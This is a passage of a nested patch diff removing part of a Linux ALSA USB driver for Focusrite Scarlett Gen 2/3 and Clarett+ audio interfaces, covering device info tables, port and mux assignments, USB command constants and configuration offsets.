+-	u16 scarlett2_seq;
+-	u8 sync_updated;
+-	u8 vol_updated;
+-	u8 input_other_updated;
+-	u8 monitor_other_updated;
+-	u8 mux_updated;
+-	u8 speaker_switching_switched;
+-	u8 sync;
+-	u8 master_vol;
+-	u8 vol[SCARLETT2_ANALOGUE_MAX];
+-	u8 vol_sw_hw_switch[SCARLETT2_ANALOGUE_MAX];
+-	u8 mute_switch[SCARLETT2_ANALOGUE_MAX];
+-	u8 level_switch[SCARLETT2_LEVEL_SWITCH_MAX];
+-	u8 pad_switch[SCARLETT2_PAD_SWITCH_MAX];
+-	u8 dim_mute[SCARLETT2_DIM_MUTE_COUNT];
+-	u8 air_switch[SCARLETT2_AIR_SWITCH_MAX];
+-	u8 phantom_switch[SCARLETT2_PHANTOM_SWITCH_MAX];
+-	u8 phantom_persistence;
+-	u8 direct_monitor_switch;
+-	u8 speaker_switching_switch;
+-	u8 talkback_switch;
+-	u8 talkback_map[SCARLETT2_OUTPUT_MIX_MAX];
+-	u8 msd_switch;
+-	u8 standalone_switch;
+-	struct snd_kcontrol *sync_ctl;
+-	struct snd_kcontrol *master_vol_ctl;
+-	struct snd_kcontrol *vol_ctls[SCARLETT2_ANALOGUE_MAX];
+-	struct snd_kcontrol *sw_hw_ctls[SCARLETT2_ANALOGUE_MAX];
+-	struct snd_kcontrol *mute_ctls[SCARLETT2_ANALOGUE_MAX];
+-	struct snd_kcontrol *dim_mute_ctls[SCARLETT2_DIM_MUTE_COUNT];
+-	struct snd_kcontrol *level_ctls[SCARLETT2_LEVEL_SWITCH_MAX];
+-	struct snd_kcontrol *pad_ctls[SCARLETT2_PAD_SWITCH_MAX];
+-	struct snd_kcontrol *air_ctls[SCARLETT2_AIR_SWITCH_MAX];
+-	struct snd_kcontrol *phantom_ctls[SCARLETT2_PHANTOM_SWITCH_MAX];
+-	struct snd_kcontrol *mux_ctls[SCARLETT2_MUX_MAX];
+-	struct snd_kcontrol *direct_monitor_ctl;
+-	struct snd_kcontrol *speaker_switching_ctl;
+-	struct snd_kcontrol *talkback_ctl;
+-	u8 mux[SCARLETT2_MUX_MAX];
+-	u8 mix[SCARLETT2_INPUT_MIX_MAX * SCARLETT2_OUTPUT_MIX_MAX];
+-};
+-
+-/*** Model-specific data ***/
+-
+-static const struct scarlett2_device_info s6i6_gen2_info = {
+-	.usb_id = USB_ID(0x1235, 0x8203),
+-
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
+-	.level_input_count = 2,
+-	.pad_input_count = 2,
+-
+-	.line_out_descrs = {
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  4,  4 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = {  6,  6 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info s18i8_gen2_info = {
+-	.usb_id = USB_ID(0x1235, 0x8204),
+-
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
+-	.level_input_count = 2,
+-	.pad_input_count = 4,
+-
+-	.line_out_descrs = {
+-		"Monitor L",
+-		"Monitor R",
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8,  6 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = {  8, 18 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 10 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  4 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info s18i20_gen2_info = {
+-	.usb_id = USB_ID(0x1235, 0x8201),
+-
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_2,
+-	.line_out_hw_vol = 1,
+-
+-	.line_out_descrs = {
+-		"Monitor L",
+-		"Monitor R",
+-		NULL,
+-		NULL,
+-		NULL,
+-		NULL,
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8, 10 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 18 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,     0,  8 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,     0,  4 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 10 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  6 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info solo_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8211),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_NO_MIXER,
+-	.level_input_count = 1,
+-	.level_input_first = 1,
+-	.air_input_count = 1,
+-	.phantom_count = 1,
+-	.inputs_per_phantom = 1,
+-	.direct_monitor = 1,
+-};
+-
+-static const struct scarlett2_device_info s2i2_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8210),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_NO_MIXER,
+-	.level_input_count = 2,
+-	.air_input_count = 2,
+-	.phantom_count = 1,
+-	.inputs_per_phantom = 2,
+-	.direct_monitor = 2,
+-};
+-
+-static const struct scarlett2_device_info s4i4_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8212),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
+-	.level_input_count = 2,
+-	.pad_input_count = 2,
+-	.air_input_count = 2,
+-	.phantom_count = 1,
+-	.inputs_per_phantom = 2,
+-
+-	.line_out_descrs = {
+-		"Monitor L",
+-		"Monitor R",
+-		"Headphones L",
+-		"Headphones R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = { 1, 0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = { 4, 4 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 6, 8 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = { 4, 6 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  6 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 16 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info s8i6_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8213),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
+-	.level_input_count = 2,
+-	.pad_input_count = 2,
+-	.air_input_count = 2,
+-	.phantom_count = 1,
+-	.inputs_per_phantom = 2,
+-
+-	.line_out_descrs = {
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = { 1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = { 6,  4 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = { 2,  2 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 8,  8 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = { 6, 10 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      8,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 18 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info s18i8_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8214),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
+-	.line_out_hw_vol = 1,
+-	.has_speaker_switching = 1,
+-	.level_input_count = 2,
+-	.pad_input_count = 4,
+-	.air_input_count = 4,
+-	.phantom_count = 2,
+-	.inputs_per_phantom = 2,
+-
+-	.line_out_remap_enable = 1,
+-	.line_out_remap = { 0, 1, 6, 7, 2, 3, 4, 5 },
+-
+-	.line_out_descrs = {
+-		"Monitor L",
+-		"Monitor R",
+-		"Alt Monitor L",
+-		"Alt Monitor R",
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8,  8 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 20 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = {  8, 20 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      12,  8 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      10,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
+-		{ 0,                             0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      12,  4 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      10,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
+-		{ 0,                             0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  6,  2 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  2,  4 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,       0, 20 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
+-		{ 0,                             0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info s18i20_gen3_info = {
+-	.usb_id = USB_ID(0x1235, 0x8215),
+-
+-	.has_msd_mode = 1,
+-	.config_set = SCARLETT2_CONFIG_SET_GEN_3,
+-	.line_out_hw_vol = 1,
+-	.has_speaker_switching = 1,
+-	.has_talkback = 1,
+-	.level_input_count = 2,
+-	.pad_input_count = 8,
+-	.air_input_count = 8,
+-	.phantom_count = 2,
+-	.inputs_per_phantom = 4,
+-
+-	.line_out_descrs = {
+-		"Monitor 1 L",
+-		"Monitor 1 R",
+-		"Monitor 2 L",
+-		"Monitor 2 R",
+-		NULL,
+-		NULL,
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  9, 10 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 12, 25 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 20 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0,  8 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      10, 10 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_PCM,       8,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,       0, 25 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 12 },
+-		{ 0,                             0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0,  8 },
+-		{ SCARLETT2_PORT_TYPE_PCM,      10,  8 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,      0,  8 },
+-		{ SCARLETT2_PORT_TYPE_PCM,       8,  2 },
+-		{ SCARLETT2_PORT_TYPE_MIX,       0, 25 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
+-		{ 0,                             0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
+-		{ SCARLETT2_PORT_TYPE_NONE,      0, 24 },
+-		{ 0,                             0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info clarett_8pre_info = {
+-	.usb_id = USB_ID(0x1235, 0x820c),
+-
+-	.config_set = SCARLETT2_CONFIG_SET_CLARETT,
+-	.line_out_hw_vol = 1,
+-	.level_input_count = 2,
+-	.air_input_count = 8,
+-
+-	.line_out_descrs = {
+-		"Monitor L",
+-		"Monitor R",
+-		NULL,
+-		NULL,
+-		NULL,
+-		NULL,
+-		"Headphones 1 L",
+-		"Headphones 1 R",
+-		"Headphones 2 L",
+-		"Headphones 2 R",
+-	},
+-
+-	.port_count = {
+-		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
+-		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8, 10 },
+-		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
+-		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
+-		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
+-		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 18 },
+-	},
+-
+-	.mux_assignment = { {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,     0,  8 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,     0,  4 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 12 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 22 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info *scarlett2_devices[] = {
+-	/* Supported Gen 2 devices */
+-	&s6i6_gen2_info,
+-	&s18i8_gen2_info,
+-	&s18i20_gen2_info,
+-
+-	/* Supported Gen 3 devices */
+-	&solo_gen3_info,
+-	&s2i2_gen3_info,
+-	&s4i4_gen3_info,
+-	&s8i6_gen3_info,
+-	&s18i8_gen3_info,
+-	&s18i20_gen3_info,
+-
+-	/* Supported Clarett+ devices */
+-	&clarett_8pre_info,
+-
+-	/* End of list */
+-	NULL
+-};
+-
+-/* get the starting port index number for a given port type/direction */
+-static int scarlett2_get_port_start_num(
+-	const int port_count[][SCARLETT2_PORT_DIRNS],
+-	int direction, int port_type)
+-{
+-	int i, num = 0;
+-
+-	for (i = 0; i < port_type; i++)
+-		num += port_count[i][direction];
+-
+-	return num;
+-}
+-
+-/*** USB Interactions ***/
+-
+-/* Notifications from the interface */
+-#define SCARLETT2_USB_NOTIFY_SYNC          0x00000008
+-#define SCARLETT2_USB_NOTIFY_DIM_MUTE      0x00200000
+-#define SCARLETT2_USB_NOTIFY_MONITOR       0x00400000
+-#define SCARLETT2_USB_NOTIFY_INPUT_OTHER   0x00800000
+-#define SCARLETT2_USB_NOTIFY_MONITOR_OTHER 0x01000000
+-
+-/* Commands for sending/receiving requests/responses */
+-#define SCARLETT2_USB_CMD_INIT 0
+-#define SCARLETT2_USB_CMD_REQ  2
+-#define SCARLETT2_USB_CMD_RESP 3
+-
+-#define SCARLETT2_USB_INIT_1    0x00000000
+-#define SCARLETT2_USB_INIT_2    0x00000002
+-#define SCARLETT2_USB_GET_METER 0x00001001
+-#define SCARLETT2_USB_GET_MIX   0x00002001
+-#define SCARLETT2_USB_SET_MIX   0x00002002
+-#define SCARLETT2_USB_GET_MUX   0x00003001
+-#define SCARLETT2_USB_SET_MUX   0x00003002
+-#define SCARLETT2_USB_GET_SYNC  0x00006004
+-#define SCARLETT2_USB_GET_DATA  0x00800000
+-#define SCARLETT2_USB_SET_DATA  0x00800001
+-#define SCARLETT2_USB_DATA_CMD  0x00800002
+-
+-#define SCARLETT2_USB_CONFIG_SAVE 6
+-
+-#define SCARLETT2_USB_VOLUME_STATUS_OFFSET 0x31
+-#define SCARLETT2_USB_METER_LEVELS_GET_MAGIC 1
+-
+-/* volume status is read together (matches scarlett2_config_items[1]) */
+-struct scarlett2_usb_volume_status {
+-	/* dim/mute buttons */
+-	u8 dim_mute[SCARLETT2_DIM_MUTE_COUNT];
+-
+-	u8 pad1;
+-
+-	/* software volume setting */
+-	s16 sw_vol[SCARLETT2_ANALOGUE_MAX];
+-
+-	/* actual volume of output inc. dim (-18dB) */
+-	s16 hw_vol[SCARLETT2_ANALOGUE_MAX];
+-
+-	/* internal mute buttons */
+-	u8 mute_switch[SCARLETT2_ANALOGUE_MAX];
+-
+-	/* sw (0) or hw (1) controlled */
+-	u8 sw_hw_switch[SCARLETT2_ANALOGUE_MAX];
+-
+-	u8 pad3[6];
+-
+-	/* front panel volume knob */
+-	s16 master_vol;
+-} __packed;
+-
+-/* Configuration parameters that can be read and written */
+-enum {
+-	SCARLETT2_CONFIG_DIM_MUTE = 0,
+-	SCARLETT2_CONFIG_LINE_OUT_VOLUME = 1,
+-	SCARLETT2_CONFIG_MUTE_SWITCH = 2,
+-	SCARLETT2_CONFIG_SW_HW_SWITCH = 3,
+-	SCARLETT2_CONFIG_LEVEL_SWITCH = 4,
+-	SCARLETT2_CONFIG_PAD_SWITCH = 5,
+-	SCARLETT2_CONFIG_MSD_SWITCH = 6,
+-	SCARLETT2_CONFIG_AIR_SWITCH = 7,
+-	SCARLETT2_CONFIG_STANDALONE_SWITCH = 8,
+-	SCARLETT2_CONFIG_PHANTOM_SWITCH = 9,
+-	SCARLETT2_CONFIG_PHANTOM_PERSISTENCE = 10,
+-	SCARLETT2_CONFIG_DIRECT_MONITOR = 11,
+-	SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH = 12,
+-	SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE = 13,
+-	SCARLETT2_CONFIG_TALKBACK_MAP = 14,
+-	SCARLETT2_CONFIG_COUNT = 15
+-};
+-
+-/* Location, size, and activation command number for the configuration
+- * parameters. Size is in bits and may be 1, 8, or 16.
+- */
+-struct scarlett2_config {
+-	u8 offset;
+-	u8 size;
+-	u8 activate;
+-};
+-
+-static const struct scarlett2_config
+-	scarlett2_config_items[SCARLETT2_CONFIG_SET_COUNT]
+-			      [SCARLETT2_CONFIG_COUNT] =
+-
+-/* Devices without a mixer (Gen 3 Solo and 2i2) */
+-{ {
+-	[SCARLETT2_CONFIG_MSD_SWITCH] = {
+-		.offset = 0x04, .size = 8, .activate = 6 },
+-
+-	[SCARLETT2_CONFIG_PHANTOM_PERSISTENCE] = {
+-		.offset = 0x05, .size = 8, .activate = 6 },
+-
+-	[SCARLETT2_CONFIG_PHANTOM_SWITCH] = {
+-		.offset = 0x06, .size = 8, .activate = 3 },
+-
+-	[SCARLETT2_CONFIG_DIRECT_MONITOR] = {
+-		.offset = 0x07, .size = 8, .activate = 4 },
+-
+-	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
+-		.offset = 0x08, .size = 1, .activate = 7 },
+-
+-	[SCARLETT2_CONFIG_AIR_SWITCH] = {
+-		.offset = 0x09, .size = 1, .activate = 8 },
+-
+-/* Gen 2 devices: 6i6, 18i8, 18i20 */
+-}, {
+-	[SCARLETT2_CONFIG_DIM_MUTE] = {
+-		.offset = 0x31, .size = 8, .activate = 2 },
+-
+-	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
+-		.offset = 0x34, .size = 16, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
+-		.offset = 0x5c, .size = 8, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
+-		.offset = 0x66, .size = 8, .activate = 3 },
+-
+-	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
+-		.offset = 0x7c, .size = 8, .activate = 7 },
+-
+-	[SCARLETT2_CONFIG_PAD_SWITCH] = {
+-		.offset = 0x84, .size = 8, .activate = 8 },
+-
+-	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
+-		.offset = 0x8d, .size = 8, .activate = 6 },
+-
+-/* Gen 3 devices: 4i4, 8i6, 18i8, 18i20 */
+-}, {
+-	[SCARLETT2_CONFIG_DIM_MUTE] = {
+-		.offset = 0x31, .size = 8, .activate = 2 },
+-
+-	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
+-		.offset = 0x34, .size = 16, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
+-		.offset = 0x5c, .size = 8, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
+-		.offset = 0x66, .size = 8, .activate = 3 },
+-
+-	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
+-		.offset = 0x7c, .size = 8, .activate = 7 },
+-
+-	[SCARLETT2_CONFIG_PAD_SWITCH] = {
+-		.offset = 0x84, .size = 8, .activate = 8 },
+-
+-	[SCARLETT2_CONFIG_AIR_SWITCH] = {
+-		.offset = 0x8c, .size = 8, .activate = 8 },
+-
+-	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
+-		.offset = 0x95, .size = 8, .activate = 6 },
+-
+-	[SCARLETT2_CONFIG_PHANTOM_SWITCH] = {
+-		.offset = 0x9c, .size = 1, .activate = 8 },
+-
+-	[SCARLETT2_CONFIG_MSD_SWITCH] = {
+-		.offset = 0x9d, .size = 8, .activate = 6 },
+-
